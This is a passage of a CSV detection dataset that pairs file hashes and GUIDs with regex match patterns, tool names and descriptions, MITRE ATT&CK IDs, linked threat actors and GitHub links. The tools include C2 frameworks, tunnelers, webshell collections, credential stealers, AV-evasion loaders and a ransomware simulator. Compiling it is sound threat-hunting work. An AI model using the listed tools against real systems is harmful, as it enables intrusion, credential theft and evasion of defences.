- APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","N/A","10","10","829","141","2025-04-02T09:37:10Z","2020-08-17T21:33:06Z","36630" "*c001ef60b326a1b510e14111fc6f0d5639b47aa0d842e73f52935a9fffa794c5*",".{0,1000}c001ef60b326a1b510e14111fc6f0d5639b47aa0d842e73f52935a9fffa794c5.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","36631" "*c0067d058ae4086ba276aa5d712782428fc0f72dff4cfb67f77c3d6ac08f9fb5*",".{0,1000}c0067d058ae4086ba276aa5d712782428fc0f72dff4cfb67f77c3d6ac08f9fb5.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36632" "*c00b3bbcd7cf59063dfc9eae66351a40c7be586e61156347b8c61a8627d6cb72*",".{0,1000}c00b3bbcd7cf59063dfc9eae66351a40c7be586e61156347b8c61a8627d6cb72.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","36633" "*c00e8c409f1cb4e6e7e8bcea0a82212714f6d80cb961b2f8104c5df89059cc69*",".{0,1000}c00e8c409f1cb4e6e7e8bcea0a82212714f6d80cb961b2f8104c5df89059cc69.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36634" "*c00ed94009fe6719c5c7803fe7d96a4930693897bc8335cb2c11d749052ffbdb*",".{0,1000}c00ed94009fe6719c5c7803fe7d96a4930693897bc8335cb2c11d749052ffbdb.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","36635" "*c016717b991de5e956b84818eac0822ae860329a546c07f8ae4443d189f97522*",".{0,1000}c016717b991de5e956b84818eac0822ae860329a546c07f8ae4443d189f97522.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","36636" "*c01fb08dabbd24b151fe5dfbb0742f7a*",".{0,1000}c01fb08dabbd24b151fe5dfbb0742f7a.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#filehash","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","36638" "*c022454abb2dc5b52483870aa3a5c8c9e3da094780205735e927a17eaef7b351*",".{0,1000}c022454abb2dc5b52483870aa3a5c8c9e3da094780205735e927a17eaef7b351.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","36639" "*c02322e9bf5f1a0655cdaf316371f91257b9008d2ee6dde791bac5e8b2e5064d*",".{0,1000}c02322e9bf5f1a0655cdaf316371f91257b9008d2ee6dde791bac5e8b2e5064d.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","36640" "*c030cc4102e6bd16e8f55a5030a440f6ee5f411ad86b1c3af56b44e53cda14f6*",".{0,1000}c030cc4102e6bd16e8f55a5030a440f6ee5f411ad86b1c3af56b44e53cda14f6.{0,1000}","offensive_tool_keyword","ChaiLdr","Indirect syscalls AV bypass","T1055.011 - T1569 - T1564 - T1213","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Cipher7/ChaiLdr","1","0","#filehash","N/A","9","3","220","35","2024-05-17T13:58:04Z","2024-03-29T09:19:10Z","36642" "*c034271dfb3dc754e0b24874fde53c0657087b3832f97c405d2a59f0fc4f8193*",".{0,1000}c034271dfb3dc754e0b24874fde53c0657087b3832f97c405d2a59f0fc4f8193.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - 
TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","36644" "*c0342fc8e521fa627bfce4988c83a081f394d5587fafe3fcd6765e028eca682c*",".{0,1000}c0342fc8e521fa627bfce4988c83a081f394d5587fafe3fcd6765e028eca682c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36645" "*c0364bda334fc6450e71ddcd34eaace70089c2e6d69bdc324ffd144ac33c0c2d*",".{0,1000}c0364bda334fc6450e71ddcd34eaace70089c2e6d69bdc324ffd144ac33c0c2d.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36647" "*c0376b905f31c5d3440c2048498106aca7c86006fa9876ca85945d3a037705f5*",".{0,1000}c0376b905f31c5d3440c2048498106aca7c86006fa9876ca85945d3a037705f5.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","36648" "*c03c789b4a4f2b16feb984d81f4c6a0ccbb74449f4402ec1df19be509d9314cc*",".{0,1000}c03c789b4a4f2b16feb984d81f4c6a0ccbb74449f4402ec1df19be509d9314cc.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy 
server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","36650" "*c03ef8106c58c8980b7859e0a8ee2363d70e2b7f1346356127c826faf2c0caa3*",".{0,1000}c03ef8106c58c8980b7859e0a8ee2363d70e2b7f1346356127c826faf2c0caa3.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","36651" "*c042f360a6deff1b41405dd0f5bee637fc8242d585c714410084ef068a90d9fc*",".{0,1000}c042f360a6deff1b41405dd0f5bee637fc8242d585c714410084ef068a90d9fc.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","36652" "*c0439525cf2087fbe8093cd85039fb5efe3557bc47a8a033a7b06657d4119333*",".{0,1000}c0439525cf2087fbe8093cd85039fb5efe3557bc47a8a033a7b06657d4119333.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly 
builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","36653" "*c04b117bc1e5883c3c85ab2823071b33dbf1344e581e250fa5d80a8fae6b338b*",".{0,1000}c04b117bc1e5883c3c85ab2823071b33dbf1344e581e250fa5d80a8fae6b338b.{0,1000}","offensive_tool_keyword","ADFSDump-PS","ADFSDump to assist with GoldenSAML","T1078 - T1552.004 - T1558.004","TA0006 ","N/A","N/A","Credential Access","https://github.com/ZephrFish/ADFSDump-PS","1","0","#filehash","N/A","10","1","31","8","2024-05-20T00:00:19Z","2024-05-19T00:46:28Z","36655" "*c04f37a9510f3a79f295522ec8783b68ae246657088b517bd4d1f4fd854905ab*",".{0,1000}c04f37a9510f3a79f295522ec8783b68ae246657088b517bd4d1f4fd854905ab.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","36656" "*c05b0803f8793c6bef98a74b8950be5be30dcb0584e634355896230fb8ee19e1*",".{0,1000}c05b0803f8793c6bef98a74b8950be5be30dcb0584e634355896230fb8ee19e1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","36657" "*c0621954bd329b5cabe45e92b31053627c27fa40853beb2cce2734fa677ffd93*",".{0,1000}c0621954bd329b5cabe45e92b31053627c27fa40853beb2cce2734fa677ffd93.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","36658" "*c0621954bd329b5cabe45e92b31053627c27fa40853beb2cce2734fa677ffd93*",".{0,1000}c0621954bd329b5cabe45e92b31053627c27fa40853beb2cce2734fa677ffd93.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","36659" "*c0621954bd329b5cabe45e92b31053627c27fa40853beb2cce2734fa677ffd93*",".{0,1000}c0621954bd329b5cabe45e92b31053627c27fa40853beb2cce2734fa677ffd93.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","36660" "*c0621954bd329b5cabe45e92b31053627c27fa40853beb2cce2734fa677ffd93*",".{0,1000}c0621954bd329b5cabe45e92b31053627c27fa40853beb2cce2734fa677ffd93.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","Conti - APT29","Discovery","https://github.com/tevora-threat/SharpView/","1","0","#filehash","N/A","10","10","1032","196","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z","36661" "*c062b58a1151df4a0ebad3d9246f69342b0ac1ecf5e5a5c4116f292994c481bd*",".{0,1000}c062b58a1151df4a0ebad3d9246f69342b0ac1ecf5e5a5c4116f292994c481bd.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","#filehash","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","36662" 
"*c06a0f5ccb8fa0b7aac6360b6ec7566dc06e5226ef1de0f7071a5404ae8d0c07*",".{0,1000}c06a0f5ccb8fa0b7aac6360b6ec7566dc06e5226ef1de0f7071a5404ae8d0c07.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","36663" "*c06bb3f0-cbdc-4384-84cf-21b7fe6dfe01*",".{0,1000}c06bb3f0\-cbdc\-4384\-84cf\-21b7fe6dfe01.{0,1000}","offensive_tool_keyword","Voidgate","bypass AV/EDR memory scanners. This can be used to hide well-known and detected shellcodes","T1027 - T1070 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/undergroundwires/privacy.sexy","1","0","#GUIDproject","N/A","9","10","4632","198","2025-04-21T21:36:39Z","2019-12-31T14:38:28Z","36664" "*c070900d71a49302a7c0db6f075b353e46fa8730050ad0e03054d9999a7bf00f*",".{0,1000}c070900d71a49302a7c0db6f075b353e46fa8730050ad0e03054d9999a7bf00f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","36665" "*c070a38e1e877bdcfea1b389ed0089dc7b133acad33b2458cc1575ade877322f*",".{0,1000}c070a38e1e877bdcfea1b389ed0089dc7b133acad33b2458cc1575ade877322f.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense 
Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","36666" "*c07272b6a537d203f886cd195e1ad2def64123c52c61a5d0652b26f1b288553d*",".{0,1000}c07272b6a537d203f886cd195e1ad2def64123c52c61a5d0652b26f1b288553d.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","36667" "*c07d3356-7f9b-45e0-a4f7-7b1487d966b8*",".{0,1000}c07d3356\-7f9b\-45e0\-a4f7\-7b1487d966b8.{0,1000}","offensive_tool_keyword","1.6-C2","Using the Counter Strike 1.6 RCON protocol as a C2 Channel","T1071 - T1095 - T1572","TA0011 - TA0010","N/A","N/A","C2","https://github.com/eversinc33/1.6-C2","1","0","#GUIDproject","N/A","6","10","78","5","2025-02-19T15:34:37Z","2024-01-23T18:30:00Z","36668" "*c0800f3267b958f1f1e3796d2462897b698406ffe2c95c09b6249e84ac753bb0*",".{0,1000}c0800f3267b958f1f1e3796d2462897b698406ffe2c95c09b6249e84ac753bb0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","36669" "*c0847034ecb624fde98700f4866d0a3fb799d3ff601ccd56df5bf31a9c065a53*",".{0,1000}c0847034ecb624fde98700f4866d0a3fb799d3ff601ccd56df5bf31a9c065a53.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","36670" "*c086c1e601dbde7b31cbaea56b915f22b1ebc21d744a431984406e6062b4b865*",".{0,1000}c086c1e601dbde7b31cbaea56b915f22b1ebc21d744a431984406e6062b4b865.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","36671" "*c08ba6e45d3859ecb3cd5df132fb04dcd86913afce15057de03bba9d256de4ef*",".{0,1000}c08ba6e45d3859ecb3cd5df132fb04dcd86913afce15057de03bba9d256de4ef.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","36672" "*c08c8daee59d11347beda11ee23bfe120dc0503718bad492a5c09f17267848de*",".{0,1000}c08c8daee59d11347beda11ee23bfe120dc0503718bad492a5c09f17267848de.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","36673" "*c09008db98890127c9d7b2c86260bb670f7768c8310e61fc45707feee6afd25c*",".{0,1000}c09008db98890127c9d7b2c86260bb670f7768c8310e61fc45707feee6afd25c.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","36676" "*c09373970ec5bbb6a3dfd02d13b233cf733501dbb92f3550f9168864087bec74*",".{0,1000}c09373970ec5bbb6a3dfd02d13b233cf733501dbb92f3550f9168864087bec74.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","36677" "*c0a1ee50bf8984cf88c85740870b39f378187b877f728f0aebcc8d8aba03df73*",".{0,1000}c0a1ee50bf8984cf88c85740870b39f378187b877f728f0aebcc8d8aba03df73.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36679" "*c0a7a797f39b509fd2d895b5731e79b57b350b85b20be5a51c0a1bda19321bd0*",".{0,1000}c0a7a797f39b509fd2d895b5731e79b57b350b85b20be5a51c0a1bda19321bd0.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","#filehash","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","36680" "*c0ac59bed2e0208db150069c4d943a73036d03271754075029bc2e41f24bb303*",".{0,1000}c0ac59bed2e0208db150069c4d943a73036d03271754075029bc2e41f24bb303.{0,1000}","offensive_tool_keyword","IHxExec","Process injection technique","T1055.001 - T1055","TA0005 - TA0004 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CICADA8-Research/IHxExec","1","0","#filehash","N/A","8","4","325","46","2024-09-06T07:58:41Z","2024-07-11T09:18:42Z","36682" "*c0bc9dc5055dc5d03e482e09afede681ccedea676c75958b22b85687f3a863a9*",".{0,1000}c0bc9dc5055dc5d03e482e09afede681ccedea676c75958b22b85687f3a863a9.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. 
This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","36684" "*c0c3027a8c08212af54ddfef22faf33a5cbee35c1d6ac2a44251d9e3dda42510*",".{0,1000}c0c3027a8c08212af54ddfef22faf33a5cbee35c1d6ac2a44251d9e3dda42510.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36686" "*c0c309f54e29865152bf4ffacf5dd7084e33dd67ee139d33e27efd6628833813*",".{0,1000}c0c309f54e29865152bf4ffacf5dd7084e33dd67ee139d33e27efd6628833813.{0,1000}","offensive_tool_keyword","PowerProxy","PowerShell SOCKS proxy with reverse proxy capabilities","T1090.003 - T1059.001 - T1105","TA0011 - TA0005 - TA0008","N/A","Dispossessor","C2","https://github.com/get-get-get-get/PowerProxy","1","0","#filehash","N/A","10","10","80","10","2021-04-23T16:51:28Z","2020-01-03T18:18:58Z","36687" "*c0cd3083f7015a42a6ceeaed3a49d889e899a1fb751fa952300e6f12669c0e4d*",".{0,1000}c0cd3083f7015a42a6ceeaed3a49d889e899a1fb751fa952300e6f12669c0e4d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","36689" 
"*c0d2859a5d2355d656eb7beb4c19608ab5c5d4407662bf0fd0e1f056f906f6ba*",".{0,1000}c0d2859a5d2355d656eb7beb4c19608ab5c5d4407662bf0fd0e1f056f906f6ba.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#filehash","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","36690" "*c0da41824e720bb18073595598f9ee4f3b15f7cffe800f44fe0f8799b8acbe3f*",".{0,1000}c0da41824e720bb18073595598f9ee4f3b15f7cffe800f44fe0f8799b8acbe3f.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","36691" "*c0dad6868eb7c797c29eda978260136be4e5c097c1a3187e3d35db66bf140946*",".{0,1000}c0dad6868eb7c797c29eda978260136be4e5c097c1a3187e3d35db66bf140946.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","36692" 